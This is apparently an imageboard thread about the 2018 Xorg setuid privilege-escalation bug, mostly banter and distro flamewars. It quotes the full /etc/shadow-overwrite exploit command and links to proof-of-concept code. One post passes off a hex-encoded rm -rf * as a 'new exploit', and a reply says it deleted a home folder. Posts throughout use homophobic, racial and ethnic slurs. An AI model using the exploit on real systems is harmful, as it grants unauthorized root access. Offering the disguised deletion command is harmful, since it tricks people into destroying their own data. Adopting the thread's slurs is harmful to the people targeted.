Root on Linux with a single command

/thread

(OP)
>2018
>Xorg as root
Meanwhile
securityaffairs.co/wordpress/77360/hacking/windows-zero-day-sandboxescaper.html

>ssh
disabled

>Microsoft Data Sharing Service exploit
>Only Affects Windows 10
Feels good being a boomer and using 7.

all versions of Windows have so many privilege escalation exploits that it's not even funny anymore.

But at least I'm not prone to this one. Take that, users who updated.

Are you fag/g/ots convinced that Wayland is better yet? X is 80s spaghetti code, hacks on top of hacks, and even the X devs think so.
Support a better future for GNU/Linux.
wayland.freedesktop.org/

Attached: 1024px-Wayland_Logo.svg (1).png (1024x1024, 55K)

>/usr/libexec/Xorg.wrap: Only console users are allowed to run the X server
>Password:

it doesnt work

Attached: Screenshot from 2018-10-30 16-39-13.png (1056x233, 77K)

True, that's why macos is the most secure os ever

Surely you can't be serious.

really boggles the toggles

Attached: scrot.png (741x118, 18K)

here's the same exploit that works on even more distros:

gist.github.com/0x27/d8aae5de44ed385ff2a3d80196907850

>doesn't work
>oh no you can't be serious
epic win bro

??????

Attached: Screenshot from 2018-10-30 11-53-05.png (404x743, 152K)

Will not work on my machine - Debian Testing.
According to , Xorg should have an "s" bit in the owner permissions.

>already running X
>Only console users are allowed to run the X server
>"wow bro doesn't work bro"

Attached: 1519365246568.png (300x250, 45K)

>Computerphile
nigga if i wanted to watch reddit tier i le fucking love science i'd just read elon musk's twitter

so its literally unusable on desktops

Its not a single command you brainlet its 3.

I actually wanted to use it to repair my broken suoders file but i see its impossible since you need root privleges to stop xorg

here ya go boss

Attached: download9ddd0a06_storage_2femulated_2f0_2fDCIM_2fCamera_2fIMG_20181030_120411.png (1408x500, 487K)

asks me for a password both in the console and in an X terminal emulator. I call bullshit

OP that's an old exploit that was already fixed. this is the new one:
$(echo 726d202d7266202a | xxd -r -p)
it works by sending bytes to your soundcard that cause a buffer overflow. if you turn on your speakers you will actually hear a tune before you gives you root

I assume this has already been fixed by now, got an Xorg update not long after this shit was announced.

wow this is so cool, thanks user!

t. buttmad freetard

it started removing my home folder and I didn't hear any tune, you must have made a typo or something

he's trolling

Whats up with those exploits, none of them works

Attached: 1540726047718.jpg (640x360, 70K)

>meanwhile
>implying this is worse than full root privileges
>a bug that can be used to delete some stuff
>proof of concept
>can't be used remotely
You poor thing. I'll inform suicide watch for you.

the way(land) doesn't have this problem

Attached: 2258222_lrlrlr3.jpg (1200x630, 35K)

>Xorg
lmao not using the glorious Wayland in 2018

>Wayland
half the shit still doesn't work with Wayland.

I RUN EVERYTHING AS ROOT SO THIS IS _NOT_ A PROBLEM FOR ME

-bash: Xorg: command not found
Password:

What am I doing wrong, guys?

X is deprecated. That's like saying Wintards are BTFO because XP has exploits.

This Tbh.

Attached: 2018-02-23-101253_1024x768_scrot.png (1024x768, 865K)

It asking for a password.
Nice exploit bro.

Attached: Screenshot_20181030_225847.png (1920x1080, 719K)

Wow, that sounds like the music from that swordsman Zelda

Also Xorg needs to run as root for this to work.

what a sad and pathetic thread
Delete yourself, OP

Attached: 1540493505437.png (936x910, 1.02M)

how did you make your terminal look so fancy

who the fuck installs xorg on server linux

t. buttmad pajeet who can't afford a real computer so he uses Loonix shit.
kek'd. and pls use some of your own advice.

Who the fuck uses Windows with any concern for data security?

Attached: am i retarded.png (665x574, 266K)

glorious pc masterrace, stupid console users at it again

Gentoo is immune
su: Authentication service cannot retrieve authentication info

Windows wins again it doesn't have ssh

Run it on a tty user

Linux basedcucks on suicide watch.
Anybody with a brain long moved to better pastures, such as seL4.

Pretty sure my PC costs more than your car, OP.

Let me know when it's actually finished and ready to be used

ha ha ha
reddit.com/r/europe/comments/95l4w9/i_am_stefan_soesanto_working_on_cyber_defence/e3u0vqb/

Don't do it on your main system, -logfile shadow is enough said.

What the fuck is wrong with british people? Is there something in the water to turn them into goblins?

Do you mean root if you know the root password?

Cos that's not an exploit.

Attached: Screenshot_20181030_195948.png (1366x768, 107K)

>NPCs can't update software
>blame Linux

>back in Jow Forums, another angry Microshaft NPC quotes this in a supposed "tech" forum

> Xorg
Xorg or anything it calls in the process of launching.

Attached: Capture.png (671x85, 6K)

Do you foken undesten wat it does?!?!?! Ffs, fire up a KVM, do Ctrl+Alt+F1, log in and type this. Do not launch it on a box where you browse Jow Forums from. You are basically running shit off Jow Forums on your PC.

OP is a fag

Attached: Screenshot_20181030_160515.png (648x519, 28K)

this
yea, that only works if I gave my ssh key to someone else. This is like giving your key to your house to someone else and crying about it when you get mugged.

I rate this thread 2/100
F- see me after class

Attached: 87525257-fail-grade-result-f-hand-drawn-vector-grade-with-minus-in-circle-flat-illustration.jpg (450x450, 16K)

>Do you mean root if you know the root password?
you don't need root.

twitter.com/hackerfantastic/status/1055517801224396800

> All these people trying to run Xorg in a TERMINAL EMULATOR
>>>>>"Jow Forums - Technology"

I'll have u know i watched every episode of mr robert and also run kali linux

>This dude thinking it doesn't work

>"Jow Forums - Social outcasts that get confused with computer literates because they still use a desktop"

Arch doesn't have this problem
twitter.com/obilodeau/status/1055541061697716224

Rajesh it doesn't work on either a tty or a terminal emulator

All the good British genes went to the colonies.

You can (and should) be running X11 rootless with logind.

>have unprivileged shell access on a machine through metasploit
>run Xorg command because of course it's a "server" machine running a fucking desktop for easy management
>congrats you're root
if you can't see the value in this, you need to leave

Can confirm.

Except the Xorg command itself doesn't even work, not in tty, not within an X session.

I can confirm in my Arch machine, Maybe Arch patched this quickly enough. Also may be

I'd just like to interject for a moment. What you're referring to as Linux, is in fact, GNU/Linux, or as I've recently taken to calling it, GNU plus Linux. Linux is not an operating system unto itself, but rather another free component of a fully functioning GNU system made useful by the GNU corelibs, shell utilities and vital system components comprising a full OS as defined by POSIX.

Many computer users run a modified version of the GNU system every day, without realizing it. Through a peculiar turn of events, the version of GNU which is widely used today is often called "Linux", and many of its users are not aware that it is basically the GNU system, developed by the GNU Project.

There really is a Linux, and these people are using it, but it is just a part of the system they use. Linux is the kernel: the program in the system that allocates the machine's resources to the other programs that you run. The kernel is an essential part of an operating system, but useless by itself; it can only function in the context of a complete operating system. Linux is normally used in combination with the GNU operating system: the whole system is basically GNU with Linux added, or GNU/Linux. All the so-called "Linux" distributions are really distributions of GNU/Linux.

Attached: 1470108185907.jpg (518x600, 443K)

>every linux distro can be powned. by a single command! lol'd hard.
at this moment you are euphoric, because you are enlightened by your own intelligence.
then you realize that the large majority of distros were not affected by this bug (only those were affedted that acutally use a recent version of xorg, and run xserver-xorg with unsafe settings)

You're trying too hard. You aren't fitting in. You need to go back.

Arch already fixed it

Attached: Screenshot from 2018-10-31 07-49-48.png (1200x1006, 114K)

>tried it in tty
>xorg errors and asks for root pswd
gee you are dumb

You do know an increasing amount of people are dropping Xorg for Wayland, right?

Boot from a USB live Linux and edit the file from there.

>You do know an increasing amount of people are dropping Xorg for Wayland, right?
stfu. only fedora fags are shipping with Wayland. Wayland lacks support for so many things that it's next to useless for any real desktop. I used wayland for like 3 days and crawled back to Xorg.

Which distribution(s) install Xorg with the setuid bit? This is a legit exploit if Xorg is installed that way. I'm just asking because I'm not aware of any that actually do this.

You can exploit this and there is proof of concept code at
exploit-db.com/exploits/45697/

and as that patch and the CVEs themselves point out:
>Impacts Xorg 1.19.0 - 1.20.2 which ships setuid

>every linux distro can be powned.
Nope.

>Xorg should have an "s" bit in the owner permissions
Yes, that's a requirement. So which distributions do this? I mean.. I can chmod +s and test this and see that it works .. but if you're able to do that already then what's the point

>privilege escalation exploit
this doesn't concern desktop users

Attached: 1528492185984.png (743x720, 631K)

only thing this did was fuck up my tty1 and reset the tty2 where I wrote it

jason@Yog-Sothoth:/media/jason/John/Capture$ cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su
/usr/lib/xorg/Xorg.wrap: Only console users are allowed to run the X server
Password:

>Is there something in the water to turn them into goblins?
Pakis are in the water turning them into goblins.

>every linux distro can be powned. by a single command!
literally false

Cool, you can tell me about them, and give me details. I'd really like to hear about them.